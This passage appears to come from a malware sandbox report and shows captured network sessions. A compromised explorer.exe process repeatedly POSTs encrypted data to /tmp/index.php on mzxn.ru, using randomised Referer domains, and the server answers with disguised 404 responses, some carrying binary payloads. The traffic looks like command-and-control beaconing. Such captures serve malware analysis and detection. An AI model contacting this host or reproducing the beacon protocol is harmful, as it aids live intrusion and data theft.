                          Timestamp: Aug 6, 2024 14:48:33.954848051 CEST | Bytes transferred: 369 | Direction: OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 6e 26 b1 ed
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vun&lZ|jAXwvo(>^>LDZ\Y[5Q)H9>[_r ;\}/|ADAV~xc72$t
                          Timestamp: Aug 6, 2024 14:48:35.534559965 CEST | Bytes transferred: 484 | Direction: IN | Data: HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:35 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49742 | Destination IP: 58.151.148.90 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                          Timestamp: Aug 6, 2024 14:48:35.543487072 CEST | Bytes transferred: 276 | Direction: OUT | Data: POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://fwffjwnakkt.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 217
                          Host: mzxn.ru
                          Timestamp: Aug 6, 2024 14:48:35.543487072 CEST | Bytes transferred: 217 | Direction: OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 2d 41 e1 b5
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vu-AWOf`hmYr(slIz_>C'F,V4EHw2bZ|s].,696'v"
                          Timestamp: Aug 6, 2024 14:48:37.059124947 CEST | Bytes transferred: 484 | Direction: IN | Data: HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:36 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49743 | Destination IP: 58.151.148.90 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                          Timestamp: Aug 6, 2024 14:48:37.067718983 CEST | Bytes transferred: 278 | Direction: OUT | Data: POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://hlaxjpgxxibka.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 344
                          Host: mzxn.ru
                          Timestamp: Aug 6, 2024 14:48:37.067754984 CEST | Bytes transferred: 344 | Direction: OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 3c 01 be fa
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vu<Nz{^m!O.Q+HN/~(BXl%0RNJr'@9z_+V1I.)"bsGH@O38
                          Timestamp: Aug 6, 2024 14:48:39.509258032 CEST | Bytes transferred: 137 | Direction: IN | Data: HTTP/1.1 200 OK
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:39 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close


                          Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49744 | Destination IP: 58.151.148.90 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                          Timestamp: Aug 6, 2024 14:48:39.517291069 CEST | Bytes transferred: 280 | Direction: OUT | Data: POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://qxykcmjeqiqyjoi.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 265
                          Host: mzxn.ru
                          Timestamp: Aug 6, 2024 14:48:39.517313004 CEST | Bytes transferred: 265 | Direction: OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 27 2e c1 bb
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vu'.?oNLtg.])N_u(T,\zo%PBvjE52M{<VruiS(@6PA.*FbtSi,Uf~K0t
                          Timestamp: Aug 6, 2024 14:48:41.820534945 CEST | Bytes transferred: 484 | Direction: IN | Data: HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:41 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49745 | Destination IP: 58.151.148.90 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                          Timestamp: Aug 6, 2024 14:48:41.830480099 CEST | Bytes transferred: 279 | Direction: OUT | Data: POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://vqtbeoidrbmewm.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 278
                          Host: mzxn.ru
                          Timestamp: Aug 6, 2024 14:48:41.830612898 CEST | Bytes transferred: 278 | Direction: OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 35 2a b3 88
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vu5*r_zxX0dgE|oODh5bOR,45]YGR>g^6]vMn3pJ#QW9*|zH|b^fQ%L!
                          Timestamp: Aug 6, 2024 14:48:43.292944908 CEST | Bytes transferred: 484 | Direction: IN | Data: HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:42 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session ID: 10 | Source IP: 192.168.2.4 | Source Port: 49746 | Destination IP: 58.151.148.90 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                          Timestamp: Aug 6, 2024 14:48:43.306885958 CEST | Bytes transferred: 280 | Direction: OUT | Data: POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://sowqaemgjxhutlr.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 177
                          Host: mzxn.ru
                          Timestamp: Aug 6, 2024 14:48:43.306912899 CEST | Bytes transferred: 177 | Direction: OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 64 32 e6 e5
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vud2V>TXlZgpVAAfpNUp>:KZV>U8jrZ}b
                          Timestamp: Aug 6, 2024 14:48:44.854724884 CEST | Bytes transferred: 137 | Direction: IN | Data: HTTP/1.1 200 OK
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:44 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close


                          Session ID: 11 | Source IP: 192.168.2.4 | Source Port: 49747 | Destination IP: 58.151.148.90 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                          Timestamp: Aug 6, 2024 14:48:44.863045931 CEST | Bytes transferred: 276 | Direction: OUT | Data: POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://qggmqqxdvbb.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 286
                          Host: mzxn.ru
                          Timestamp: Aug 6, 2024 14:48:44.863070965 CEST | Bytes transferred: 286 | Direction: OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 72 53 ea f8
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vurS+eqya$n8pVs]jsR\cU*Zm;N}b~0ke+7cpz!5-0+yxWU$dJg<9]t
                          Timestamp: Aug 6, 2024 14:48:46.439511061 CEST | Bytes transferred: 137 | Direction: IN | Data: HTTP/1.1 200 OK
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:46 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close


                          Session ID: 12 | Source IP: 192.168.2.4 | Source Port: 49748 | Destination IP: 58.151.148.90 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                          Timestamp: Aug 6, 2024 14:48:46.450459003 CEST | Bytes transferred: 277 | Direction: OUT | Data: POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://cypfufcosssb.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 246
                          Host: mzxn.ru
                          Timestamp: Aug 6, 2024 14:48:46.450483084 CEST | Bytes transferred: 246 | Direction: OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 43 43 db 96
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vuCCMJw`Bu*rKV`tw1|H0{._kbVn!i_Su!Lw=agNPm^?Xd*!G
                          Timestamp: Aug 6, 2024 14:48:48.379570007 CEST | Bytes transferred: 484 | Direction: IN | Data: HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:48 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session ID: 13 | Source IP: 192.168.2.4 | Source Port: 49749 | Destination IP: 58.151.148.90 | Destination Port: 80 | PID: 2580 | Process: C:\Windows\explorer.exe
                          Timestamp: Aug 6, 2024 14:48:48.388230085 CEST | Bytes transferred: 276 | Direction: OUT | Data: POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://asulighvhvx.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 334
                          Host: mzxn.ru
                          Timestamp: Aug 6, 2024 14:48:48.388256073 CEST | Bytes transferred: 334 | Direction: OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 3d 05 b4 e2
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vu=NQP}n5Dv7*q.G~:://&#VM=\$nXi))N22s\EPkUq"Xq2kh#6
                          Timestamp: Aug 6, 2024 14:48:50.165376902 CEST | Bytes transferred: 192 | Direction: IN | Data: HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:49 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 09 78 49 e3 2b 0f e9 ed 57 f7 9f f6 af 30 da 2d da f5 6c 58 00 85 86 8b 80 61 cc 3b


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          14 | 192.168.2.4 | 49752 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:48:53.607857943 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://typuxgfkyjirf.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 136
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:53.607873917 CEST | 136 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 06 6b 2c 90 f4 76 0b 75 57 07 d6 a7
                          Aug 6, 2024 14:48:56.016000986 CEST | 484 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:55 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          15 | 192.168.2.4 | 49753 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:48:56.027187109 CEST | 277 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://alapkefvafgo.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 135
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:56.027223110 CEST | 135 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 56 5c b5 98
                          Aug 6, 2024 14:48:57.595113993 CEST | 206 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:57 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 7f 55 e7 39 04 fc ea 48 e6 8e ac a9 2d 99 61 c2 e8 6e 59 1a 82 9e 8a c0 70 9b 37 18 12 98 07 99 16 76 5a 57 e8 d5 7f e5 7c


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          16 | 192.168.2.4 | 49755 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:49:00.837105989 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://yclxfxgmqbvjkhy.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 300
                          Host: mzxn.ru
                          Aug 6, 2024 14:49:00.837105989 CEST | 300 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 07 6b 2c 90 f4 76 0b 75 6c 3f d2 f7
                          Aug 6, 2024 14:49:02.391630888 CEST | 484 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:49:02 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          17 | 192.168.2.4 | 49756 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:49:02.414455891 CEST | 277 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://kiaaagbssjkd.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 204
                          Host: mzxn.ru
                          Aug 6, 2024 14:49:02.414470911 CEST | 204 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 3d 5b e4 90
                          Aug 6, 2024 14:49:04.205972910 CEST | 484 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:49:03 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                          Aug 6, 2024 14:49:04.209490061 CEST | 484 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:49:03 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          18 | 192.168.2.4 | 49759 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:50:11.723174095 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://srhunmufdtubiva.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 248
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:11.723174095 CEST | 248 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7d 5a eb ed
                          Aug 6, 2024 14:50:14.241234064 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:13 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          19 | 192.168.2.4 | 49760 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:50:18.938966990 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://jmoobswoyynvmcc.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 208
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:18.938990116 CEST | 208 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 26 1c c6 e5
                          Aug 6, 2024 14:50:20.436502934 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:20 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          20 | 192.168.2.4 | 49761 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:50:24.240449905 CEST | 277 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://nepghogipjla.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 261
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:24.240544081 CEST | 261 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 57 cc 99
                          Aug 6, 2024 14:50:25.754066944 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:25 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          21 | 192.168.2.4 | 49762 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:50:29.423993111 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://pomgyqmowolnyuhi.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 364
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:29.424031019 CEST | 364 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 57 be a9
                          Aug 6, 2024 14:50:30.906397104 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:30 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          22 | 192.168.2.4 | 49763 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
                          Timestamp | Bytes transferred | Direction | Data
                          Aug 6, 2024 14:50:34.508505106 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://uxdwmdslnymyde.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 169
                          Host: mzxn.ru
                          Aug 6, 2024 14:50:34.508505106 CEST | 169 | OUT | Data Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 41 0e c5 90
                          Aug 6, 2024 14:50:36.064568996 CEST | 151 | IN | HTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:50:35 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 03 00 00 00 72 e8 84


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                          23 | 192.168.2.4 | 49764 | 58.151.148.90 | 80 | 2580 | C:\Windows\explorer.exe
